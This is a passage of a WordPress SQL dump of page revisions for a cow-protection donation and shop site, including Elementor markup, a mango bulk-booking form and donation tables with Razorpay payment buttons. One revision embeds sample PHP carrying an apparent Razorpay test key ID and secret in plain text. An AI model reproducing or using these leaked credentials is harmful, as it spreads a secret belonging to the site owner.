https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by <a href=\"https://themehunk.com/\" target=\"_blank\" rel=\"noopener\">Themehunk</a></p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 12:41:57','2022-10-28 07:11:57','',1373,'https://gopalak.in/?p=2025',0,'revision','',0),(2026,1,'2022-03-09 13:22:50','2022-03-09 07:52:50','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"text\",\"label\":\"Place\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"text\",\"label\":\"Mobile Number\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"checkbox\",\"label\":\"Select Mangoes For Bulk Booking\",\"choices\":{\"1\":{\"label\":\"Devagad Alphonso\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"Ratnagiri Alphonso\",\"value\":\"\",\"image\":\"\"},\"3\":{\"label\":\"Dasheri\",\"value\":\"\",\"image\":\"\"},\"14\":{\"label\":\"Totapuri \",\"value\":\"\",\"image\":\"\"},\"15\":{\"label\":\"Banginapalli\",\"value\":\"\",\"image\":\"\"},\"16\":{\"label\":\"Neelam\",\"value\":\"\",\"image\":\"\"},\"17\":{\"label\":\"Hapus\",\"value\":\"\",\"image\":\"\"},\"18\":{\"label\":\"Sindhura\",\"value\":\"\",\"image\":\"\"},\"19\":{\"label\":\"Raspuri\",\"value\":\"\",\"image\":\"\"},\"20\":{\"label\":\"Himasagar\",\"value\":\"\",\"image\":\"\"},\"21\":{\"label\":\"Malgova\",\"value\":\"\",\"image\":\"\"},\"22\":{\"label\":\"Kesar\",\"value\":\"\",\"image\":\"\"},\"23\":{\"label\":\"Langra\",\"value\":\"\",\"image\":\"\"},\"24\":{\"label\":\"Imam Pasand\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"choices_images_style\":\"modern\",\"input_columns\":\"3\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"1234\",\"field_id\":10,\"settings\":{\"form_title\":\"Bulk Booking\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Bulk Booking Order\",\"sender_name\":\"MangoMitra\",\"sender_address\":\"mango@homedirect.in\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"560\",\"redirect\":\"\"}}},\"meta\":{\"template\":\"blank\"}}','Bulk Booking','','inherit','closed','closed','','1234-revision-v1','','','2022-03-09 13:22:50','2022-03-09 07:52:50','',1234,'https://gopalak.in/?p=2026',0,'revision','',0),(2027,1,'2022-11-02 11:24:36','2022-11-02 05:54:36','[[\"Organisation\",\"Purpose\",\"Amount\",\"Donate\"],[\"Gopalak donation2\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation3\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation4\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation5\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVXh43gBGGIVUq\\\" async> </script> </form>\"]]','Donation','','inherit','closed','closed','','1851-revision-v1','','','2022-11-02 11:24:36','2022-11-02 05:54:36','',1851,'https://gopalak.in/?p=2027',0,'revision','',0),(2028,1,'2022-11-02 16:00:18','2022-11-02 10:30:18','[[\"Organisation\",\"Purpose\",\"Amount\",\"Donate\"],[\"Gopalak donation2\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation3\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation4\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation5\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"$api = new Api($key_id, $secret);\\n\\n$api->paymentLink->create(array(\'amount\'=>500, \'currency\'=>\'INR\', \'accept_partial\'=>true, \'first_min_partial_amount\'=>100, \'description\' => \'For XYZ purpose\', \'customer\' => array(\'name\'=>\'Gaurav Kumar\', \'email\' => \'gaurav.kumar@example.com\', \'contact\'=>\'+919999999999\'),  \'notify\'=>array(\'sms\'=>true, \'email\'=>true) ,\'reminder_enable\'=>true , \'options\'=>array(\'checkout\'=>array(\'name\'=>\'Lacme Corp\'))));\\n\\n<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVXh43gBGGIVUq\\\" async> </script> </form>\"]]','Donation','','inherit','closed','closed','','1851-revision-v1','','','2022-11-02 16:00:18','2022-11-02 10:30:18','',1851,'https://gopalak.in/?p=2028',0,'revision','',0),(2029,1,'2022-11-02 16:05:54','2022-11-02 10:35:54','[[\"Organisation\",\"Purpose\",\"Amount\",\"Donate\"],[\"Gopalak donation2\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation3\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation4\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation5\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"\\n\\n<form>$api = new Api(rzp_test_uLspAPRQgxEJ0S\\n, 5adwp7r9i8xNLer5vQwJb5e6\\n);\\n\\n$api->paymentLink->create(array(\'amount\'=>500, \\n\'currency\'=>\'INR\', \'accept_partial\'=>true, \\n\'first_min_partial_amount\'=>100, \\n\'description\' => \'For XYZ purpose\', \\n\'customer\' => array(\'name\'=>\'Gaurav Kumar\', \\n\'email\' => \'gaurav.kumar@example.com\',\\n \'contact\'=>\'+919999999999\'), \\n \'notify\'=>array(\'sms\'=>true, \'email\'=>true) ,\\n\'reminder_enable\'=>true , \\n\'options\'=>array(\'checkout\'=>array(\'name\'=>\'Lacme Corp\'))));<script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\\n\\n\"]]','Donation','','inherit','closed','closed','','1851-revision-v1','','','2022-11-02 16:05:54','2022-11-02 10:35:54','',1851,'https://gopalak.in/?p=2029',0,'revision','',0),(2030,1,'2022-11-02 16:06:46','2022-11-02 10:36:46','[[\"Organisation\",\"Purpose\",\"Amount\",\"Donate\"],[\"Gopalak donation2\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation3\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation4\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"]]','Donation','','inherit','closed','closed','','1851-revision-v1','','','2022-11-02 16:06:46','2022-11-02 10:36:46','',1851,'https://gopalak.in/?p=2030',0,'revision','',0),(2031,1,'2022-11-03 09:41:06','2022-11-03 04:11:06','<style>/*! elementor - v3.8.0 - 30-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.8.0 - 30-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon 